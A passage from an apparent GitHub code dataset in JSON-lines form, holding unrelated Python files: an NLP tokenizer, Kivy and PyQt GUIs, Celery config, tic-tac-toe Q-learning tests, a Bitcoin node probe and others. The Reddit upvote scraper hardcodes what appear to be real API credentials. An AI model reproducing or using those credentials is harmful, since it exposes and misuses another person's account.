item[0],item[1],item[2],item[4]\n\n\n\n","repo_name":"ChWeiking/PythonSpider","sub_path":"PythonSpider/Python爬虫/爬虫Python实战/实战1/糗百3.py","file_name":"糗百3.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"29553689107","text":"import spacy as spacy\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nfrom app.ml.pipline import Extractor\n\nspacy_en = spacy.load('en_core_web_sm')\nspacy_en.remove_pipe('tagger')\nspacy_en.remove_pipe('ner')\nvocab = list(spacy_en.vocab.strings)\n\n\ndef tokenizer(text, use_lema=False): # create a tokenizer function\n p = 'lemma_' if use_lema else 'text' # property to use\n return [getattr(tok, p, '') for tok in spacy_en.tokenizer(text)\n if tok.text.isalpha()\n and len(getattr(tok, p, '')) > 1\n and getattr(tok, p, '') not in ['\\ufeff1', '-PRON-', '-pron-']]\n\n\ncounters = dict(\n [(i,\n CountVectorizer(ngram_range=(1, i),\n stop_words=\"english\",\n tokenizer=tokenizer,\n # vocabulary=vocab\n )\n )\n for i in range(1, 4)]\n)\nextractor = Extractor(tokenizer)\n","repo_name":"lifast-dayoungovich/Semantic-Back","sub_path":"app/ml/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"27267124491","text":"from kivy.metrics import dp\n\nfrom previews.creator_article_preview import CreatorArticlePreview\nfrom my_screen import MyScreen\nfrom kivymd.app import MDApp\n\nimport requests\n\nfrom author_pages.new_article_screen import NewArticleScreen\n\n\nclass ArticlePageScreen(MyScreen):\n def __init__(self, **kwargs):\n super(ArticlePageScreen, self).__init__(**kwargs)\n self.ids.articles_grid.bind(minimum_height=self.ids.articles_grid.setter('height'))\n self.ids.layout.bind(minimum_height=self.ids.layout.setter('height'))\n\n def load_articles(self):\n self.ids.articles_grid.clear_widgets()\n creator_id = MDApp.get_running_app().user\n articles = requests.get(\"https://lifehealther.onrender.com/article/creator/\" + str(creator_id))\n if articles.json() != {}:\n for i in articles.json().values():\n url = \"https://lifehealther.onrender.com/article/\" + str(i[\"id\"])\n article_info = requests.get(url)\n article_info = article_info.json()\n article_text = article_info[\"text\"]\n if len(article_text) > 115:\n article_text = article_text[:115] + \"...\"\n article_preview = CreatorArticlePreview(size_hint_y=None,\n height=dp(250),\n content_id=i[\"id\"],\n headline=article_info[\"article_name\"],\n text_preview=article_text,\n create_upd=self.create_upd\n )\n self.ids.articles_grid.add_widget(article_preview)\n\n def create_upd(self, upd_screen):\n self.manager.add_widget(upd_screen)\n self.manager.screen_history.append(self.manager.current)\n self.manager.current = 'update_article'\n self.manager.transition.direction = 'left'\n\n def create_add(self):\n self.manager.add_widget(NewArticleScreen(name='new_article'))\n","repo_name":"safonchikk/diploma","sub_path":"author_pages/article_page.py","file_name":"article_page.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"38047361491","text":"import os\nimport logging\nimport stackprinter\n\nfrom celery import Celery, Task\nfrom celery.schedules import crontab\n\nfrom django.apps import apps, AppConfig\nfrom django.conf import settings\n\nif not settings.configured:\n # set the default Django settings module for the 'celery' program.\n os.environ.setdefault(\n \"DJANGO_SETTINGS_MODULE\", \"config.settings.local\"\n ) # pragma: no cover\n\napp = Celery(\"instanotifier\")\n\n\nclass CeleryConfig(AppConfig):\n name = \"instanotifier.taskapp\"\n verbose_name = \"Celery Config\"\n\n def ready(self):\n # Using a string here means the worker will not have to\n # pickle the object when using Windows.\n app.config_from_object(\"django.conf:settings\", namespace=\"CELERY\")\n installed_apps = [app_config.name for app_config in apps.get_app_configs()]\n app.autodiscover_tasks(lambda: installed_apps, force=True)\n\n\napp.conf.beat_schedule = {\n \"fetch_all_sources_daily\": {\n \"task\": \"instanotifier.feedsource.tasks.fetch_all_sources\",\n \"schedule\": crontab(minute=00, hour=[11, 23]),\n }\n}\n\n\nclass LogErrorsTask(Task):\n def on_failure(self, exc, task_id, args, kwargs, einfo):\n tb = stackprinter.format(exc)\n logging.error(tb)\n super().on_failure(exc, task_id, args, kwargs, einfo)\n\n\n@app.task(bind=True)\ndef debug_task(self):\n print(\"Request: {0!r}\".format(self.request)) # pragma: no cover\n","repo_name":"AlexanderKaluzhny/instanotifier","sub_path":"instanotifier/taskapp/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"57"} +{"seq_id":"23566534595","text":"# -*- coding: utf-8 -*-\nimport string\nclass Linguist(object):\n \n def __init__(self,message):\n self.message = message\n def analyse_text(self):\n analyse = dict()\n word_occurance = dict()\n charac_occurance = dict()\n analyse[\"length of the string\"] = len(self.message) \n self.word_count = 1\n self.charac_count = 0\n for x in self.message :\n if x == \" \" :\n self.word_count += 1\n else :\n self.charac_count += 1\n analyse[\"word count\"] = self.word_count\n analyse[\"no of character\"] = self.charac_count\n charac_list = list(self.message)\n word_list = (self.message).split()\n for word in word_list:\n word_occurance[word] = word_list.count(word)\n self.nonrepeat = 0\n for word in word_occurance :\n if word_occurance[word] == 1 : \n self.nonrepeat += 1\n analyse[\"unique word\"] = self.nonrepeat\n for letter in charac_list:\n charac_occurance[letter] = charac_list.count(letter)\n self.letter_count = 0\n for letter in charac_occurance :\n if charac_occurance[letter] == 1 :\n self.letter_count += 1\n analyse[\"unique character\"] = self.letter_count\n return analyse\n def is_english(self):\n letter_list = list(self.message)\n result = True\n for letter in letter_list :\n if letter in list(string.ascii_letters) or letter == \" \" :\n result = True\n else:\n result = False\n break\n return result\n \n \n \nobj = Linguist('my name is jamesbond007')\nprint(obj.is_english()) \n ","repo_name":"joelranjithjebanesan7/Python-Programs","sub_path":"session5/lab5.py","file_name":"lab5.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"19897186362","text":"# -*- coding: utf-8 -*-\n\nfrom simmate.apps.vasp.workflows.static_energy.matproj import (\n StaticEnergy__Vasp__Matproj,\n)\n\n\nclass Nmr__Vasp__MatprojChemicalShifts(StaticEnergy__Vasp__Matproj):\n \"\"\"\n This task is a reimplementation of pymatgen's\n [MPNMRSet](https://pymatgen.org/pymatgen.io.vasp.sets.html#pymatgen.io.vasp.sets.MPNonSCFSet)\n with mode=\"cs\" (Chemical Shift).\n \"\"\"\n\n incar = StaticEnergy__Vasp__Matproj.incar.copy()\n incar.update(\n dict(\n LCHIMAG=True,\n EDIFF=-1.0e-10,\n ISYM=0,\n LCHARG=False,\n LNMR_SYM_RED=True,\n NELMIN=10,\n NSLPLINE=True,\n PREC=\"ACCURATE\",\n SIGMA=0.01,\n )\n )\n incar.pop(\"EDIFF__per_atom\")\n","repo_name":"jacksund/simmate","sub_path":"src/simmate/apps/vasp/workflows/nuclear_magnetic_resonance/matproj_chemical_shifts.py","file_name":"matproj_chemical_shifts.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"57"} +{"seq_id":"74699956016","text":"'''\nFunction to handle retrieving the skydiving weather\n'''\n\nimport response_helper\n\ndef get_skydiving_weather(intent, session):\n session_attributes = {}\n reprompt_text = None\n \n speech_output = \"It's sunny blue skies! go jump!\"\n should_end_session = True\n \n\n # Setting reprompt_text to None signifies that we do not want to reprompt\n # the user. If the user does not respond or says something that is not\n # understood, the session will end.\n return response_helper.build_response(session_attributes, response_helper.build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))","repo_name":"anirudhranganath/alexa-skydiving-weather","sub_path":"src/behaviour/get_weather.py","file_name":"get_weather.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"15159227489","text":"import numpy as np\nfrom scipy import signal\n\n\ndef gkern(kernlen=21, std=None):\n \"\"\"Returns a 2D Gaussian kernel array.\"\"\"\n if std is None:\n std = kernlen / 4\n gkern1d = signal.gaussian(kernlen, std=std).reshape(kernlen, 1)\n gkern2d = np.outer(gkern1d, gkern1d)\n return gkern2d\n\n\ndef build_gaussian_heatmaps(kp_xyc, w, h, gaussian=None):\n gaussian_heatmaps = np.zeros((len(kp_xyc), h, w))\n for i, kp in enumerate(kp_xyc):\n # do not use invisible keypoints\n if kp[2] == 0:\n continue\n\n kpx, kpy = kp[:2].astype(int)\n\n if gaussian is None:\n g_scale = 6\n g_radius = int(w / g_scale)\n gaussian = gkern(g_radius * 2 + 1)\n else:\n g_radius = gaussian.shape[0] // 2\n\n rt, rb = min(g_radius, kpy), min(g_radius, h - 1 - kpy)\n rl, rr = min(g_radius, kpx), min(g_radius, w - 1 - kpx)\n\n gaussian_heatmaps[i, kpy - rt:kpy + rb + 1, kpx - rl:kpx + rr + 1] = gaussian[\n g_radius - rt:g_radius + rb + 1,\n g_radius - rl:g_radius + rr + 1]\n return gaussian_heatmaps\n","repo_name":"VlSomers/bpbreid","sub_path":"torchreid/utils/imagetools.py","file_name":"imagetools.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"57"} +{"seq_id":"13694304535","text":"# performance.py\nfrom time import time\nmx = 5000\n\nt = time() # start time for the for loop\nfloop = []\nfor a in range(1, mx):\n\tfor b in range(a, mx):\n\t\tfloop.append(divmod(a, b))\nprint('for loop: {:4f} s' . format(time() - t)) # elapsed time\n\nt = time() # start time for the list comprehension\ncompr = [divmod(a, b) for a in range(1, mx) for b in range(a, mx)]\nprint('list comprehension: {:4f} s' . format(time() - t))\n\nt = time() # start time for the generator expression\ngener = list(divmod(a, b) for a in range(1, mx) for b in range(a, mx))\nprint('generator expression: {:4f} s' . format(time() - t))\n","repo_name":"mhVxVNMwXkm9s4Ze9VASei/Learn-Python-Programming","sub_path":"05. Comprehensions and Generators/36. performance.py","file_name":"36. performance.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"5043797224","text":"# Centralized definitions for injecting reusable variables\n# into templates. Variables should be added to the dict returned by\n# the template_variables function.\n\nimport pytz\nfrom flask import g, request, current_app\n\nimport sfa_dash\nfrom sfa_dash import filters\nfrom solarforecastarbiter.datamodel import (\n ALLOWED_CATEGORIES,\n ALLOWED_DETERMINISTIC_METRICS,\n ALLOWED_EVENT_METRICS,\n ALLOWED_PROBABILISTIC_METRICS,\n ALLOWED_VARIABLES,\n COMMON_NAMES,\n)\nfrom solarforecastarbiter.validation.quality_mapping import (\n DISCARD_BEFORE_RESAMPLE)\nfrom solarforecastarbiter.metrics.deterministic import _REQ_REF_FX as DETREF\nfrom solarforecastarbiter.metrics.probabilistic import _REQ_REF_FX as PROBREF\nfrom solarforecastarbiter.metrics.event import _REQ_REF_FX as EVENTREF\n\n\n\nTIMEZONES = pytz.country_timezones('US') + list(\n filter(lambda x: 'GMT' in x, pytz.all_timezones))\n\n\nVARIABLE_OPTIONS = {key: f'{value} ({filters.api_varname_to_units(key)})'\n for key, value in filters.variable_mapping.items()}\n\nDEFAULT_VARIABLE = 'ghi'\n\n\nTIMEZONE_OPTIONS = {tz: tz.replace('_', ' ') for tz in TIMEZONES}\n\n\nDEFAULT_METRICS = ['mae', 'mbe', 'rmse']\n\nDEFAULT_CATEGORIES = ['total', 'year', 'month', 'hour', 'date']\n\nALL_METRICS = {}\nALL_METRICS.update(ALLOWED_DETERMINISTIC_METRICS)\nALL_METRICS.update(ALLOWED_EVENT_METRICS)\nALL_METRICS.update(ALLOWED_PROBABILISTIC_METRICS)\n\nALLOWED_QUALITY_FLAGS = {\n 'USER FLAGGED': 'USER FLAGGED',\n 'NIGHTTIME': 'NIGHTTIME',\n 'CLEARSKY': 'CLEARSKY (GHI only)',\n 'LIMITS EXCEEDED': 'LIMITS EXCEEDED',\n 'STALE VALUES': 'STALE VALUES (includes fixed values at nighttime)',\n 'DAYTIME STALE VALUES': 'DAYTIME STALE VALUES',\n 'INTERPOLATED VALUES':\n 'INTERPOLATED VALUES (includes fixed values at nighttime)',\n 'DAYTIME INTERPOLATED VALUES': 'DAYTIME INTERPOLATED VALUES'\n}\n\nINTERVAL_LABEL_OPTIONS = {\n 'beginning': 'Beginning',\n 'ending': 'Ending',\n 'instant': 'Instant',\n 'event': 'Event',\n}\n\nREQ_REF_FX = DETREF + PROBREF + EVENTREF\n\n\ndef is_allowed(action):\n \"\"\"Returns if the action is allowed or not on the current object.\n\n Parameters\n ----------\n action: str\n The action to query for permission.\n\n Returns\n -------\n bool\n If the action is allowed or not.\n \"\"\"\n allowed = getattr(g, 'allowed_actions', [])\n return action in allowed\n\n\ndef can_create(object_type):\n \"\"\"Returns if a user can create an object type or not\n\n Parameters\n ----------\n object_type: str\n Type of object to check for create permissions. Should use the plural\n e.g. observations.\n\n Returns\n -------\n bool\n True if the user can create the object type, else false.\n \"\"\"\n allowed = object_type in getattr(g, 'can_create', [])\n return allowed\n\n\ndef template_variables():\n return {\n 'dashboard_version': sfa_dash.__version__,\n 'variable_options': VARIABLE_OPTIONS,\n 'default_variable': DEFAULT_VARIABLE,\n 'timezone_options': TIMEZONE_OPTIONS,\n 'metric_categories': ALLOWED_CATEGORIES,\n 'default_categories': DEFAULT_CATEGORIES,\n 'deterministic_metrics': ALLOWED_DETERMINISTIC_METRICS,\n 'default_deterministic_metrics': DEFAULT_METRICS,\n 'event_metrics': ALLOWED_EVENT_METRICS,\n 'probabilistic_metrics': ALLOWED_PROBABILISTIC_METRICS,\n 'all_metrics': ALL_METRICS,\n 'quality_flags': ALLOWED_QUALITY_FLAGS,\n 'discard_before_resample': DISCARD_BEFORE_RESAMPLE,\n 'is_allowed': is_allowed,\n 'current_path': request.path,\n 'MAX_DATA_RANGE_DAYS': current_app.config['MAX_DATA_RANGE_DAYS'].days,\n 'MAX_PLOT_DATAPOINTS': current_app.config['MAX_PLOT_DATAPOINTS'],\n 'variable_names': COMMON_NAMES,\n 'variable_unit_map': ALLOWED_VARIABLES,\n 'interval_label_options': INTERVAL_LABEL_OPTIONS,\n 'can_create': can_create,\n 'REQ_REF_FX': REQ_REF_FX\n }\n","repo_name":"SolarArbiter/solarforecastarbiter-dashboard","sub_path":"sfa_dash/template_globals.py","file_name":"template_globals.py","file_ext":"py","file_size_in_byte":3968,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"57"} +{"seq_id":"70561170098","text":"import socket\nimport struct\nimport binascii\nimport hashlib\nimport sys, re\nif sys.version_info.major < 3:\n\tsys.stderr.write('Sorry, Python 3.x needed :(\\n')\n\tsys.exit(1)\nfrom bitcoin import SelectParams\nfrom bitcoin.messages import msg_version\n\n# Good node, we think\n#HOST = '172.198.176.102'\n# Test node\n#HOST = '63.116.149.181'\n# Known node\n#HOST = 'bitcoin.coinprism.com'\nPORT = 8333\n\nHOSTS = ['136.227.27.142', \\\n\t'136.227.28.45', \\\n\t'75.104.60.47', \\\n\t'75.104.60.190', \\\n\t'136.227.27.93', \\\n\t'123.138.54.159', \\\n\t'24.17.108.172', \\\n\t'123.58.55.110', \\\n\t'136.227.111.41', \\\n\t'159.19.99.225', \\\n\t'69.207.178.52', \\\n\t'bitcoin.coinprism.com']\n\nfor HOST in HOSTS:\n\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.settimeout(1)\n\n\tdata = \"\"\n\n\ttry:\n\t\ts.connect((HOST, PORT))\n\t\tmsg = msg_version()\n\t\ts.send(msg.to_bytes())\n\t\tdata = s.recv(1024)\n\texcept socket.timeout:\n\t\tprint(\"Timeout\")\n\texcept socket.error:\n\t\tprint(\"No clue but error\")\n\n\tif re.search(\"Satoshi\", str(data)):\n\t\tprint(HOST, \" Hurray! :)\\n\")\n\telse:\n\t\tprint(HOST, \" Boo! :(\\n\")\n\n\ts.close()\n","repo_name":"jmahboob/BitcoinNodeFinder","sub_path":"bitcoin_library_test.py","file_name":"bitcoin_library_test.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"18511385","text":"from typing import List\n\n\nclass Solution:\n def minimumTeachings(self, n: int, languages: List[List[int]], friendships: List[List[int]]) -> int:\n need_friends = set() # 需要学习语言才能交流的好友列表\n\n languages = [set(language) for language in languages]\n\n for u, v in friendships:\n if not languages[u - 1] & languages[v - 1]:\n need_friends.add(u)\n need_friends.add(v)\n\n language_knows_num = [0] * n # 每种语言在需要学习语言的好友中已学习的数量\n for friend in need_friends:\n for i in languages[friend - 1]:\n language_knows_num[i - 1] += 1\n\n return len(need_friends) - max(language_knows_num)\n\n\nif __name__ == \"__main__\":\n # 1\n print(Solution().minimumTeachings(n=2, languages=[[1], [2], [1, 2]], friendships=[[1, 2], [1, 3], [2, 3]]))\n\n # 2\n print(Solution().minimumTeachings(n=3, languages=[[2], [1, 3], [1, 2], [3]],\n friendships=[[1, 4], [1, 2], [3, 4], [2, 3]]))\n","repo_name":"ChangxingJiang/LeetCode","sub_path":"1701-1800/1733/1733_Python_1.py","file_name":"1733_Python_1.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"71422579377","text":"\"\"\"\nContains the unit tests for the improved Q-learning, \nwhich is a hand-coded model-free reinforcement model.\n\"\"\"\nimport os\n\nimport pytest\nimport numpy as np\n\nfrom improved_q_learning import Improved_q_learning\n\n@pytest.fixture\ndef test_ai():\n \"\"\"\n Returns an instance of the AI to use for testing.\n \"\"\"\n return Improved_q_learning()\n\ndef test_play(test_ai):\n \"\"\"\n Tests the 'play' method of the class.\n \"\"\"\n\n initial_state = np.array([[-1, 0, 0],\n [0, 1, 0],\n [0, 0, 0]])\n \n new_state = test_ai.play(initial_state)\n\n # Checking that the AI played once and only once\n assert new_state.sum() == 1\n assert np.count_nonzero(new_state == 1) == 2\n assert np.count_nonzero(new_state == -1) == 1\n # Making sure that the values previously stored in the array were \n # not changed\n assert new_state[0, 0] == -1\n assert new_state[1, 1] == 1\n\n\n\ndef test_should_explore(test_ai):\n \"\"\"\n Tests the 'should_explore' method.\n \"\"\"\n\n # We pick 0.5 as a state value, i.e. an average move.\n state_value = 0.5\n \n # Making sure the AI never decides to explore when its exploration\n # rate is 0.\n test_ai.exploration_rate = 0\n for i in range(100):\n assert not test_ai.should_explore(state_value)\n \n # Checking that the AI will always explore if the state_value is 0,\n # i.e. if the best possible move has always led to defeat in the past,\n # and the exploration rate is 1\n test_ai.exploration_rate = 1\n state_value = 0\n for i in range(100):\n assert test_ai.should_explore(state_value)\n\n\ndef test_load_training_data(test_ai):\n \"\"\"\n Tests the 'load_training_data' method.\n \"\"\"\n if os.path.exists(\"training.json\"):\n # Checking the format of the training data.\n training_data = test_ai.load_training_data()\n\n assert isinstance(training_data, list)\n if training_data != []:\n state = training_data[-1]\n assert isinstance(state, dict)\n assert set((\"array\", \"value\", \"occurences\")) <= state.keys()\n assert type(state[\"array\"]) == np.ndarray\n assert isinstance(state[\"value\"], float) and 0 <= state[\"value\"] <= 1\n assert isinstance(state[\"occurences\"], int) and state[\"occurences\"] > 0\n\n\n else:\n # Making sure an empty list is returned if the training file \n # was not found.\n assert test_ai.load_training_data() == []\n\n\ndef test_update_training_data(test_ai):\n \"\"\"\n Tests the 'update_training_data' method.\n \"\"\"\n\n state = np.array([[1, 1, -1],\n [0, -1, 1],\n [0, 0, -1]])\n\n dummy_training_data = [\n {\n \"array\": state,\n \"value\": 0.5,\n \"occurences\": 2\n }\n ]\n\n test_ai.training_data = dummy_training_data\n test_ai.update_training_data(state, 0.2)\n\n # Making sure that state value and occurences count have been properly updated\n assert test_ai.training_data[0][\"occurences\"] == 3\n assert round(test_ai.training_data[0][\"value\"], 1) == 0.4\n\ndef test_write_training_data(test_ai):\n \"\"\"\n Tests the 'write_training_data' method.\n \"\"\"\n\n state = np.array([[1, 1, -1],\n [0, -1, 1],\n [0, 0, -1]])\n\n dummy_training_data = [\n {\n \"array\": state,\n \"value\": 0.5,\n \"occurences\": 2\n }\n ]\n test_ai.training_data = dummy_training_data\n test_ai.write_training_data()\n\n # Making sure that the training data have not been altered after \n # saving them in the JSON ant opening them again.\n test_ai.load_training_data()\n\n assert dummy_training_data == test_ai.training_data\n\n","repo_name":"vinpap/tic_tac_toe","sub_path":"test/test_improved_q_learning.py","file_name":"test_improved_q_learning.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"26562672729","text":"import praw\nimport pandas as pd\nimport numpy as np\nimport enum\n'Finally, note that the value of submission.num_comments may not match up 100% with the number of comments extracted via PRAW. ' \\\n'This discrepancy is normal as that count includes deleted, removed, and spam comments.'\n\n'Source : https://praw.readthedocs.io/en/latest/tutorials/comments.html'\n\nreddit = praw.Reddit(client_id ='jL_MW1s2qeizKg',\n client_secret='YiCB2KsvL4azFKPsxNA0KaIkpEo',\n user_agent='qweqwdsafsa')\nStone_anime = {1: 'c9gm0u',\n 2: 'ccbm1g',\n 3: 'cf8ad3',\n 4: 'ci3lz0',\n 5: 'cl4wqu',\n 6: 'co372p',\n 7: 'cr756a',\n 8: 'cuerhp',\n 9: 'cxhrr4',\n 10: 'd0hgfr',\n 11: 'd3q43y',\n 12: 'd6vtkq',\n 13: 'da19xh',\n 14: 'dd86iy',\n 15: 'dgg1qa',\n 16: 'djodqq',\n 17: 'dmy9sy',\n 18: 'dq52vc',\n 19: 'dtgzdp',\n 20: 'dwscka',\n 21: 'e02lfb',\n 22: 'e3g5n8',\n 23: 'e708er',\n 24: 'ea5gi2'\n\n}\n\nStone_anime_max_ep = 25\n\nStone_votes = []\n\nfor i in range(1, Stone_anime_max_ep):\n posts = reddit.submission(id=Stone_anime[i])\n s_votes = posts.score\n Stone_votes.append(s_votes)\n\nepno_stone = np.arange(1,25)\n\nstone_ep = []\n\nfor i in epno_stone:\n s_name = 'Episode '+str(i)\n stone_ep.append(s_name)\n\n\nslime_df = pd.DataFrame({'Episodes' : stone_ep,'Upvotes' : Stone_votes})\nslime_df.to_csv('D:\\Python\\Senku Sentiment Analyzer 2.0\\Post Upvotes\\ Dr Stone episodes posts votes .csv',encoding='utf-8-sig')\n\n","repo_name":"WeebMogul/Senku-Sentiment-Analyzer-2.0","sub_path":"Post Upvotes/Upvote get.py","file_name":"Upvote get.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"15692514483","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\nimport pandas as pd\r\nfrom PyQt5.QtWidgets import QMessageBox\r\n\r\n\r\nclass Ui_MemberPoll(object):\r\n def refreshGroupPage(self):\r\n from GroupPage import Ui_GroupPage\r\n self.window = QtWidgets.QMainWindow()\r\n self.ui = Ui_GroupPage()\r\n self.ui.setupUi(self.window)\r\n self.window.show()\r\n\r\n \r\n\r\n def submitMemberPoll(self):\r\n df = pd.read_csv('MemberPoll.csv')\r\n # MemberPollID,GroupID,AffectedMemberID,Type,Yes,No,Total\r\n affectedMemberName = self.comboBox.currentText()\r\n typepoll = self.comboBox_2.currentText()\r\n dfnamecheck = pd.read_csv('UserData.csv')\r\n fullname = affectedMemberName.split();\r\n firstname = fullname[0]\r\n for index, row in dfnamecheck.iterrows():\r\n if row['First_Name'] == firstname:\r\n affectedMemberID = row['UserID']\r\n \r\n dfgroup = pd.read_csv('GroupData.csv')\r\n currentGroupRow = dfgroup[dfgroup['currentGroup'] == 1]\r\n currentGroupID = currentGroupRow['GroupID'].iloc[0]\r\n\r\n\r\n new_row = {'MemberPollID': (len(df.index)+1),\r\n 'GroupID' : currentGroupID, # UNKOWN FOR NOW (LINK WITH GROUP ID VALUE == 1)\r\n 'AffectedMemberID' : affectedMemberID, # MATCH WITH FIRST NAME\r\n 'FirstName' : firstname,\r\n 'Type' : typepoll,\r\n 'Yes' : 1,\r\n 'No' : 0,\r\n 'Total' : 0\r\n }\r\n df = df.append(new_row, ignore_index=True)\r\n df.to_csv('MemberPoll.csv', index = False)\r\n\r\n msg = QMessageBox()\r\n msg.setWindowTitle(\"Publish Poll\")\r\n msg.setText(\"Poll has been published! Wait for at least 60% of Members to Respond before Results!\")\r\n x = msg.exec_()\r\n\r\n\r\n def setupUi(self, MemberPoll):\r\n MemberPoll.setObjectName(\"MemberPoll\")\r\n MemberPoll.resize(400, 300)\r\n self.centralwidget = QtWidgets.QWidget(MemberPoll)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n\r\n self.comboBox = QtWidgets.QComboBox(MemberPoll)\r\n self.comboBox.setGeometry(QtCore.QRect(60, 180, 271, 22))\r\n self.comboBox.setObjectName(\"comboBox\")\r\n self.comboBox.addItem(\"\")\r\n self.comboBox.addItem(\"\")\r\n self.comboBox.addItem(\"\")\r\n self.comboBox.addItem(\"\")\r\n self.comboBox.addItem(\"\")\r\n self.comboBox.addItem(\"\")\r\n self.comboBox.addItem(\"\")\r\n \r\n self.textBrowser = QtWidgets.QTextBrowser(MemberPoll)\r\n self.textBrowser.setGeometry(QtCore.QRect(20, 50, 351, 28))\r\n self.textBrowser.setObjectName(\"textBrowser\")\r\n self.comboBox_2 = QtWidgets.QComboBox(MemberPoll)\r\n self.comboBox_2.setGeometry(QtCore.QRect(60, 85, 271, 22))\r\n self.comboBox_2.setObjectName(\"comboBox_2\")\r\n self.comboBox_2.addItem(\"\")\r\n self.comboBox_2.addItem(\"\")\r\n self.comboBox_2.addItem(\"\")\r\n self.textBrowser_2 = QtWidgets.QTextBrowser(MemberPoll)\r\n self.textBrowser_2.setGeometry(QtCore.QRect(20, 145, 351, 28))\r\n self.textBrowser_2.setObjectName(\"textBrowser_2\")\r\n\r\n self.PublishPostButton = QtWidgets.QPushButton(self.centralwidget)\r\n self.PublishPostButton.setGeometry(QtCore.QRect(10, 0, 80, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Arial\")\r\n self.PublishPostButton.setFont(font)\r\n self.PublishPostButton.setObjectName(\"Publish\")\r\n self.PublishPostButton.clicked.connect(self.submitMemberPoll) # BEGIN TO PUBLISH POST\r\n self.PublishPostButton.clicked.connect(MemberPoll.close)\r\n self.PublishPostButton.clicked.connect(self.refreshGroupPage)\r\n\r\n self.retranslateUi(MemberPoll)\r\n QtCore.QMetaObject.connectSlotsByName(MemberPoll)\r\n\r\n def retranslateUi(self, MemberPoll):\r\n _translate = QtCore.QCoreApplication.translate\r\n MemberPoll.setWindowTitle(_translate(\"MemberPoll\", \"MemberPoll\"))\r\n self.textBrowser.setHtml(_translate(\"MemberPoll\", \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0//EN\\\" \\\"http://www.w3.org/TR/REC-html40/strict.dtd\\\">\\n\"\r\n\"<html><head><meta name=\\\"qrichtext\\\" content=\\\"1\\\" /><style type=\\\"text/css\\\">\\n\"\r\n\"p, li { white-space: pre-wrap; }\\n\"\r\n\"</style></head><body style=\\\" font-family:\\'MS Shell Dlg 2\\'; font-size:7.8pt; font-weight:400; font-style:normal;\\\">\\n\"\r\n\"<p style=\\\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\\\"><span style=\\\" font-family:\\'MS Shell Dlg 2\\';\\\">Select Member In Drop Down Menu</span></p></body></html>\"))\r\n \r\n userZero = \" \"\r\n userOne = \" \"\r\n userTwo = \" \"\r\n userThree = \" \"\r\n userFour = \" \"\r\n userFive = \" \"\r\n userSix = \" \"\r\n userSeven = \" \"\r\n df = pd.read_csv('GroupData.csv')\r\n for index, row in df.iterrows():\r\n if row['currentGroup'] == 1:\r\n userZero = userZero + row['Member0']\r\n userOne = userOne + row['Member1']\r\n userTwo = userTwo + row['Member2']\r\n userThree = userThree + row['Member3']\r\n userFour = userFour + row['Member4']\r\n userFive = userFive + row['Member5']\r\n userSix = userSix + row['Member6']\r\n userSeven = userSeven + row['Member7']\r\n \r\n self.comboBox.setItemText(0, _translate(\"MemberPoll\", userZero)) \r\n self.comboBox.setItemText(1, _translate(\"MemberPoll\", userOne)) \r\n self.comboBox.setItemText(2, _translate(\"MemberPoll\", userTwo)) \r\n self.comboBox.setItemText(3, _translate(\"MemberPoll\", userThree)) \r\n self.comboBox.setItemText(4, _translate(\"MemberPoll\", userFour)) \r\n self.comboBox.setItemText(5, _translate(\"MemberPoll\", userFive)) \r\n self.comboBox.setItemText(6, _translate(\"MemberPoll\", userSix)) \r\n self.comboBox.setItemText(7, _translate(\"MemberPoll\", userSeven)) \r\n\r\n self.comboBox_2.setItemText(0, _translate(\"MemberPoll\", \"Vote to Send Warning to Member\"))\r\n self.comboBox_2.setItemText(1, _translate(\"MemberPoll\", \"Vote to Kick Member Out\"))\r\n self.comboBox_2.setItemText(2, _translate(\"MemberPoll\", \"Vote to Send Compliment to Member\"))\r\n self.PublishPostButton.setText(_translate(\"CreatePost\", \"Publish\"))\r\n self.textBrowser_2.setHtml(_translate(\"MemberPoll\", \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0//EN\\\" \\\"http://www.w3.org/TR/REC-html40/strict.dtd\\\">\\n\"\r\n\"<html><head><meta name=\\\"qrichtext\\\" content=\\\"1\\\" /><style type=\\\"text/css\\\">\\n\"\r\n\"p, li { white-space: pre-wrap; 